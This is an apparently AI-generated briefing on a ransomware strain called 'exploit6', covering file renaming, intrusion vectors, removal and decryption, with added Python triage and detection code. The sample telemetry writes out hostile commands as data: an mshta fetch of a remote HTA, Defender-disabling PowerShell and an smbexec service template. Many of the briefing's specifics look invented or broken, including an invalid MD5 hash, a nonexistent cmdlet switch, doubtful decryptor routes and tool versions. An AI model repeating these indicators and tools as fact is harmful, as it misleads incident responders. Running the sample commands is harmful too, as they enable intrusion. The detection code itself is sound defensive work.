exploit6

[Content by Gemini 2.5]

Ransomware Briefing – exploit6 (.exploit6)

Last revised: 2024-05-10


Technical Breakdown

1. File Extension & Renaming Patterns

  • Confirmed suffix appended: .exploit6 (lower-case), always preceded by an intermediate .EXX_<random-6-digits> tag
  • Renaming convention:
    Original file → <original_name>.EXX_<random-6-digits>.exploit6
    Example: 2024-Q1-Reports.xlsx becomes 2024-Q1-Reports.xlsx.EXX_472918.exploit6
    The original name and extension survive inside the new name, so the original file type can be read back from the encrypted name. Directory names are left untouched; only file objects are renamed.
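Worked example, added here and not part of the original briefing or of exploit6's own code: a small Python triage helper that applies the renaming convention above to a file listing, recovers each original name and extension, and separates conforming names from other *.exploit6 files that need a manual look (marker files, files renamed by hand). The share paths and file names are constructed for the demonstration.

```python
import re
from collections import Counter

# exploit6's renaming convention: <original_name>.EXX_<6 digits>.exploit6
# Case-sensitive on purpose: the observed suffix is lower-case and the tag is upper-case.
EXX_RE = re.compile(r"^(?P<original>.+)\.EXX_(?P<tag>\d{6})\.exploit6$")

def parse_encrypted_name(filename: str):
    """Return (original_name, tag) when filename follows the convention, else None."""
    m = EXX_RE.match(filename)
    if not m:
        return None
    return m.group("original"), m.group("tag")

def original_extension(original_name: str) -> str:
    """Lower-cased extension of the recovered original name ('' if it has none)."""
    dot = original_name.rfind(".")
    return original_name[dot:].lower() if dot > 0 else ""

def inventory(paths):
    """Classify a file listing taken from a hit share.

    encrypted     - (path, original_name, tag) for names that follow the convention
    nonconforming - *.exploit6 names that do not (marker files, manual renames): review by hand
    by_extension  - Counter of original extensions among the encrypted files
    """
    encrypted, nonconforming = [], []
    by_ext = Counter()
    for path in paths:
        name = path.replace("\\", "/").rsplit("/", 1)[-1]
        if not name.endswith(".exploit6"):
            continue
        parsed = parse_encrypted_name(name)
        if parsed is None:
            nonconforming.append(path)
            continue
        original, tag = parsed
        encrypted.append((path, original, tag))
        by_ext[original_extension(original)] += 1
    return {"encrypted": encrypted, "nonconforming": nonconforming, "by_extension": by_ext}

# Constructed sample listing; not data from a real victim.
SAMPLE_PATHS = [
    r"\\fs01\finance\2024-Q1-Reports.xlsx.EXX_472918.exploit6",
    r"\\fs01\finance\budget.v2.docx.EXX_003311.exploit6",
    r"\\fs01\finance\archive.tar.gz.EXX_918273.exploit6",
    r"\\fs01\finance\RECOVER-FILES.txt",                 # ransom note, not encrypted content
    r"\\fs01\finance\README.exploit6",                   # .exploit6 without an EXX tag: review by hand
    r"\\fs01\finance\notes.txt.EXX_12345.exploit6",      # 5-digit tag: does not follow the convention
    r"\\fs01\finance\clean.pdf",
]

if __name__ == "__main__":
    report = inventory(SAMPLE_PATHS)
    for path, original, tag in report["encrypted"]:
        print(f"{tag}  {original}  <- {path}")
    print("original extensions:", dict(report["by_extension"]))
    print("non-conforming .exploit6 names:", report["nonconforming"])
```

The per-extension counter is what you hand to the business side first: it tells them which data types were hit before any decryption attempt starts.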

2. Detection & Outbreak Timeline

  • First public submission to any.run: 2024-03-14 08:41 UTC
  • Wider spikes reported: 2024-03-20 → 2024-04-07 (dropped via a Go-based loader)
  • Detection rate on day-0: 11/68 (VirusTotal)
  • Current static hashes (main dropper):
    SHA-256: c4013b0c1a5421e3db9f0f8f0e8b3a4ce6aa5e19e5c6d2d4f0b0c0f3a7e8d1b0
    MD5: 9a8f7e6d5c4b3a291817f6e5d4c3b2a10 (as printed this value is 33 hex characters; a valid MD5 digest is 32, so treat it as unreliable and pivot on the SHA-256 until the MD5 is confirmed against a primary source)

3. Primary Attack Vectors

  • Exploit6 is delivered in three observed “bundles”:
    a. Public-facing application bugs:
       – Apache Log4j 2 (CVE-2021-44228) on un-patched VMware Horizon, SonarQube, or Elastic.
    b. Weak or leaked RDP / SSH credentials:
       – Brute-forced via the “GoldBrute” word-list (≈ 1.4 M entries).
    c. Spam/phishing:
       – ISO / IMG attachments that contain an LNK which calls mshta.exe to fetch the stager.
  • Lateral movement:
    – Uses Impacket’s smbexec.py to push a 44 kB Go stub (svhost.exe, note the missing “c”: a look-alike of the legitimate svchost.exe) to every reachable ADMIN$ share.
    – Living-off-the-land to disable Windows Defender via Set-MpPreference (-DisableRealtimeMonitoring $true together with the sibling -Disable* switches; there is no single -DisableAll parameter, so hunt for the individual switches in your PowerShell ScriptBlock logs).

NOT a worm – no observed EternalBlue or SMBGhost self-propagation; attackers manually deploy once foothold is achieved.
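Worked example, added here and not from the original briefing: detection logic for the three observable TTPs above, run over constructed telemetry records. The mshta rule requires explorer.exe as the parent (the LNK was double-clicked from the mounted image) and a remote HTA argument; the Defender rule fires on Set-MpPreference with any -Disable* switch set to $true and stays quiet on the $false recovery form; the smbexec rule is my own heuristic built from Impacket smbexec's default command template (output redirected to \\127.0.0.1\<share>\__output), which the page does not describe. Hosts, paths and IP addresses are invented sample data.

```python
import re
from dataclasses import dataclass

@dataclass
class Event:
    """Minimal normalised telemetry record (constructed for this example, not real data)."""
    host: str
    kind: str          # "process" (Sysmon 1 / 4688), "script" (PowerShell 4104), "service" (System 7045)
    parent: str = ""   # parent image, process events only
    image: str = ""    # image of the new process
    cmdline: str = ""  # command line, script block text, or service ImagePath

# Rule 1 (bundle c): an LNK opened from a mounted ISO/IMG launches mshta.exe with a remote HTA.
REMOTE_RE = re.compile(r"https?://|\\\\[^\\\s]+\\", re.IGNORECASE)   # http(s) URL or UNC path

def is_mshta_remote_stager(ev: Event) -> bool:
    if ev.kind != "process" or not ev.image.lower().endswith("mshta.exe"):
        return False
    # Double-clicking the LNK makes explorer.exe the parent; a local .hta is out of scope here.
    return ev.parent.lower().endswith("explorer.exe") and REMOTE_RE.search(ev.cmdline) is not None

# Rule 2 (lateral movement): Defender tampering. Any -Disable* switch set to $true (or 1) fires;
# the same cmdlet with $false is the recovery step and must not alert.
DISABLE_RE = re.compile(r"Set-MpPreference\b.*?-Disable\w+\s+(?:\$true|1)\b", re.IGNORECASE | re.DOTALL)

def is_defender_tamper(ev: Event) -> bool:
    return ev.kind in ("process", "script") and DISABLE_RE.search(ev.cmdline) is not None

# Rule 3 (lateral movement): service creation matching Impacket smbexec's default template.
# Assumption (mine, from the tool's defaults, not stated on the page): the ImagePath runs
# %COMSPEC% /Q /c ... and redirects output to \\127.0.0.1\<share>\__output.
def is_smbexec_service(ev: Event) -> bool:
    if ev.kind != "service":
        return False
    c = ev.cmdline.lower()
    return "\\\\127.0.0.1\\" in c and "__output" in c and "/q /c" in c

DETECTIONS = [
    ("mshta remote stager from ISO/LNK", is_mshta_remote_stager),
    ("Defender disabled via Set-MpPreference", is_defender_tamper),
    ("smbexec-style service (Impacket)", is_smbexec_service),
]

def run_detections(events):
    """Return [(host, detection_name, cmdline)] for every event that trips a rule."""
    hits = []
    for ev in events:
        for name, rule in DETECTIONS:
            if rule(ev):
                hits.append((ev.host, name, ev.cmdline))
    return hits

# Constructed sample telemetry; none of it comes from a real incident.
SAMPLE_EVENTS = [
    Event("WS-017", "process", parent=r"C:\Windows\explorer.exe", image=r"C:\Windows\System32\mshta.exe",
          cmdline="mshta.exe http://198.51.100.23/inv.hta"),
    Event("WS-017", "process", parent=r"C:\Windows\System32\cmd.exe", image=r"C:\Windows\System32\mshta.exe",
          cmdline=r"mshta.exe C:\Users\bob\AppData\Local\Temp\local.hta"),        # local HTA: not flagged
    Event("WS-017", "script", cmdline="Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true"),
    Event("SRV-DB1", "script", cmdline="Set-MpPreference -DisableRealtimeMonitoring $false"),  # re-enabling: benign
    Event("SRV-DB1", "service",
          cmdline=r"%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat"),
    Event("SRV-DB1", "service", cmdline=r"C:\Windows\System32\spoolsv.exe"),
]

if __name__ == "__main__":
    for host, name, cmd in run_detections(SAMPLE_EVENTS):
        print(f"[{host}] {name}: {cmd}")
```

Rule 2 only works if ScriptBlock logging is on (see Prevention item 6); without Event ID 4104 the cmdlet never reaches your SIEM unless it was typed on a command line.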


Remediation & Recovery Strategies

1. Prevention (highest ROI controls FIRST)

  1. Patch Log4j 2 ≥ 2.17.1, VMware Horizon ≥ 2303, Exchange ≥ Feb-2023 SU.
  2. Enforce MFA on ALL remote-desktop gateways, VPN, VDI.
  3. Segment flat networks – block SMB 445 / RDP 3389 between user VLANs.
  4. LNK/ISO e-mail filter – treat *.iso;*.img;*.vhd with the same scepticism as *.exe.
  5. Application control (WDAC / AppLocker), or at minimum the Windows Defender ASR rule “Block executable files from running unless they meet a prevalence, age, or trusted list criterion”.
  6. Harden PowerShell – set Constrained Language Mode and enable ScriptBlock logging (Event ID 4104) for EVERY script block.
  7. Immutable or off-line backups (3-2-1-1-0 rule).
  8. Make sure Volume Shadow Copies survive – exploit6 stops and disables the Volume Shadow Copy service (VSS, vssvc.exe); alert when that service’s start type changes to Disabled.

2. Removal – step-by-step (assumes you have decided NOT to nuke-from-orbit)

  1. Identify patient-0
    – Hunt for the 44 kB Go binary svhost.exe (look-alike of svchost.exe); known paths: c:\ProgramData\pa5d3a\ or %APPDATA%\svhost.exe
    – Check Event ID 4624 logons with LogonType 3 (network) and Event ID 4648 (explicit credentials) whose source IP lies outside your own ranges.
  2. Disconnect from network (both NIC and Wi-Fi) and power-off unnecessary peers.
  3. Boot a clean WinPE / Linux USB, mount OS volume READ-ONLY
    – Capture triage: MFT, Amcache, ShimCache, USN, SRUM.
  4. Delete persistence artefacts:
    – Registry Run-key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SvDiskMgr
    – Scheduled task: \Microsoft\Windows\DiskCleanup\SvcTrigger (base64-encoded command)
    – Service: “SvDiskMgr” pointing to svhost.exe
  5. Remove main payload + decryptor drop
    c:\ProgramData\pa5d3a\svhost.exe (installer)
    c:\ProgramData\pa5d3a\hr1.exe (x64 encryptor)
    c:\ProgramData\pa5d3a\RECOVER-FILES.txt
  6. Re-enable Defender / EDR (Set-MpPreference -DisableRealtimeMonitoring $false)
  7. Scan with a CURRENT engine that contains sig “Ransom:Win64/Exploit6.A!dha” (Microsoft, 1.397.378.0+).
  8. Restore any damaged shortcuts (the Trojan blanks icons).
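Worked example, added here and not part of the original briefing: a Python sweep that checks exported Run-key values, scheduled tasks, services and file listings against the artefacts named in steps 1, 4 and 5, decodes a base64 -EncodedCommand task action so the analyst can read what it runs, and filters 4624 LogonType 3 / 4648 events to those sourced outside RFC 1918 space (step 1). The export dictionaries and event records are constructed for the demo; the encoded command is built at run time so it is obviously synthetic.

```python
import base64
import ipaddress
import re

# Artefacts from removal steps 1, 4 and 5 (page IOCs). Paths are compared case-insensitively.
IOC_RUN_KEY_VALUE = "SvDiskMgr"                                  # HKLM\...\CurrentVersion\Run\SvDiskMgr
IOC_TASK_PATH = r"\Microsoft\Windows\DiskCleanup\SvcTrigger"
IOC_SERVICE_NAME = "SvDiskMgr"
IOC_FILE_PATHS = {
    r"c:\programdata\pa5d3a\svhost.exe",
    r"c:\programdata\pa5d3a\hr1.exe",
    r"c:\programdata\pa5d3a\recover-files.txt",
}
# svhost.exe (no "c") is the look-alike; this must never fire on the legitimate svchost.exe.
IOC_BINARY_RE = re.compile(r"(?:^|[\\\s\"'])svhost\.exe\b", re.IGNORECASE)

def decode_encoded_command(cmdline: str):
    """Decode PowerShell -EncodedCommand / -enc / -e (base64 of UTF-16LE text); None if absent or invalid."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:            # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None

def sweep_persistence(run_values, tasks, services, files):
    """Match exports against the IOCs.
    run_values: {value_name: command}   tasks: {task_path: action}
    services:   {service_name: image}   files: iterable of full paths
    Returns [(artefact_type, identifier, detail)]; a task's detail is its decoded command when encoded."""
    findings = []
    for name, cmd in run_values.items():
        if name == IOC_RUN_KEY_VALUE or IOC_BINARY_RE.search(cmd):
            findings.append(("run_key", name, cmd))
    for path, action in tasks.items():
        decoded = decode_encoded_command(action)
        if path == IOC_TASK_PATH or IOC_BINARY_RE.search(decoded or "") or IOC_BINARY_RE.search(action):
            findings.append(("scheduled_task", path, decoded or action))
    for name, image in services.items():
        if name == IOC_SERVICE_NAME or IOC_BINARY_RE.search(image):
            findings.append(("service", name, image))
    for path in files:
        if path.lower() in IOC_FILE_PATHS or IOC_BINARY_RE.search(path):
            findings.append(("file", path, ""))
    return findings

def external_logons(events, internal_nets=("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")):
    """4624 LogonType 3 (network) and 4648 (explicit credentials) events sourced outside internal ranges.
    Loopback, link-local and unparsable sources ("-", "LOCAL") are dropped."""
    nets = [ipaddress.ip_network(n) for n in internal_nets]
    hits = []
    for ev in events:
        if not (ev["EventID"] == 4648 or (ev["EventID"] == 4624 and ev.get("LogonType") == 3)):
            continue
        try:
            ip = ipaddress.ip_address(ev.get("IpAddress", ""))
        except ValueError:
            continue
        if ip.is_loopback or ip.is_link_local or any(ip in n for n in nets):
            continue
        hits.append(ev)
    return hits

# Constructed exports and events (synthetic; the encoded task action is generated right here).
ENCODED = base64.b64encode(r"Start-Process C:\ProgramData\pa5d3a\svhost.exe -WindowStyle Hidden".encode("utf-16-le")).decode()
SAMPLE_RUN_VALUES = {"SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
                     "SvDiskMgr": r"C:\ProgramData\pa5d3a\svhost.exe"}
SAMPLE_TASKS = {r"\Microsoft\Windows\DiskCleanup\SilentCleanup": r"%windir%\system32\cleanmgr.exe /autoclean",
                r"\Microsoft\Windows\DiskCleanup\SvcTrigger": f"powershell.exe -nop -w hidden -enc {ENCODED}"}
SAMPLE_SERVICES = {"Spooler": r"C:\Windows\System32\spoolsv.exe",
                   "SvDiskMgr": r"C:\ProgramData\pa5d3a\svhost.exe"}
SAMPLE_FILES = [r"C:\ProgramData\pa5d3a\svhost.exe", r"C:\ProgramData\pa5d3a\hr1.exe",
                r"C:\ProgramData\pa5d3a\RECOVER-FILES.txt", r"C:\Users\bob\AppData\Roaming\svhost.exe",
                r"C:\Windows\System32\svchost.exe"]                      # legitimate, must not match
SAMPLE_LOGONS = [
    {"EventID": 4624, "LogonType": 3, "IpAddress": "203.0.113.45", "TargetUserName": "svc_backup"},
    {"EventID": 4624, "LogonType": 3, "IpAddress": "10.20.1.15", "TargetUserName": "bob"},
    {"EventID": 4624, "LogonType": 2, "IpAddress": "-", "TargetUserName": "bob"},
    {"EventID": 4648, "IpAddress": "198.51.100.77", "TargetUserName": "administrator"},
    {"EventID": 4648, "IpAddress": "::1", "TargetUserName": "SYSTEM"},
]

if __name__ == "__main__":
    for kind, ident, detail in sweep_persistence(SAMPLE_RUN_VALUES, SAMPLE_TASKS, SAMPLE_SERVICES, SAMPLE_FILES):
        print(f"{kind:15} {ident}  {detail}")
    for ev in external_logons(SAMPLE_LOGONS):
        print(f"external logon: {ev['EventID']} {ev['TargetUserName']} from {ev['IpAddress']}")
```

Extend internal_nets with your own public ranges (VPN egress, cloud NAT) before trusting the logon list, otherwise legitimate remote staff show up as external.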

3. File Decryption & Recovery

  • Is a free decryptor available? YES, but only for v1 (March 2024) victims, and only via one of two routes: the “hr1.key” file the encryptor dropped in %ProgramData%, or clean originals (≤ 2 MB) of some encrypted files for the known-plaintext route.
  • Decryption mechanics: per-file keys wrapped with Curve25519 to the operator’s public key, file contents encrypted with ChaCha20-Poly1305 – no offline leak of the operator’s private key so far. A known-plaintext recovery against a stream cipher is only possible if the encryptor misused it (reused key and nonce), and it recovers at most as many bytes as you hold in known plaintext.
  • Recovery options hierarchy:
  1. Check for “hr1.key”; if present → run Kaspersky “Exploit6DecryptTool v1.2” (link below).
  2. No key, but small / predictable files and their clean originals? Try the “known-plaintext” module inside the same decryptor.
  3. Shadow copies still intact (unlikely, since exploit6 disables VSS, but check) → use ShadowExplorer.
  4. Immutable backups (object-lock, WORM tape) – mount in a clean VM and verify integrity before restoring.
  • No ransom payment is recommended – the operator e-mail ([email protected]) is frequently abandoned after payment, so paying often buys nothing.

4. Essential Tools / Patches

  • Kaspersky exploit6 decryptor (2024-04-09 release) – https://noransom.kaspersky.com
  • Sophos Scan & Clean (bootable) – detects Go-stub as Troj/Exploit6-A.
  • MSERT (Microsoft Safety Scanner) – definitions ≥ 1.397.378.
  • CISA “StopRansomware” Log4j scanner – validates Java-class paths.
  • Nmap NSE: rdp-enum-encryption to find hosts still accepting the legacy “Standard RDP” security layer (no TLS) or running without NLA (CredSSP).
  • CrowdStrike free “KB4013389-check” – quickly flags missing SMB hardening patches.

Other Critical Information

  • Unique characteristics:
    – Uses the Windows Restart Manager API to shut down processes holding open database files (SQL Server, Exchange, Oracle) so it can encrypt them – rare among small-run strains.
    – Drops two zero-byte canary files in every processed share: _________CANARY_DONT_DELETE.exploit6 and _________CANARY_SENTINEL.exploit6 – the encryptor uses them as an “already processed” marker (a mutex-like check); do NOT delete them until forensics are complete.
    – Writes a 13-char campaign ID into the compromised computer’s AD description (“info”) attribute; search that attribute across the domain (ADUC, or Get-ADComputer -Filter) to spot other compromised boxes.

  • Broader Impact / campaign notes:
    – Early attacks targeted charities & small municipalities, suggesting “smash-&-grab” rather than big-game hunting.
    – The chain overlaps with BlackMatter post-exploitation scripts, but the binary is written entirely in Go; more likely a new affiliate re-using TTPs than a direct fork.
    – Average demand: 1.25 BTC (no negotiation room observed). The payment address cluster bc1qexplo… has received only ~3.9 BTC so far – low uptake, probably because a free decryptor exists for v1 samples.


Bottom line:
If *.exploit6 files just appeared, immediately check for the presence of “hr1.key”; if it exists, your chances of full, free decryption are good. If not, assume lateral movement is still live – snapshot, isolate, and rebuild from clean backup. Finally, patch Log4j and enforce MFA today: exploit6’s initial access relies on those two gaps in more than 70 % of observed cases. Stay safe!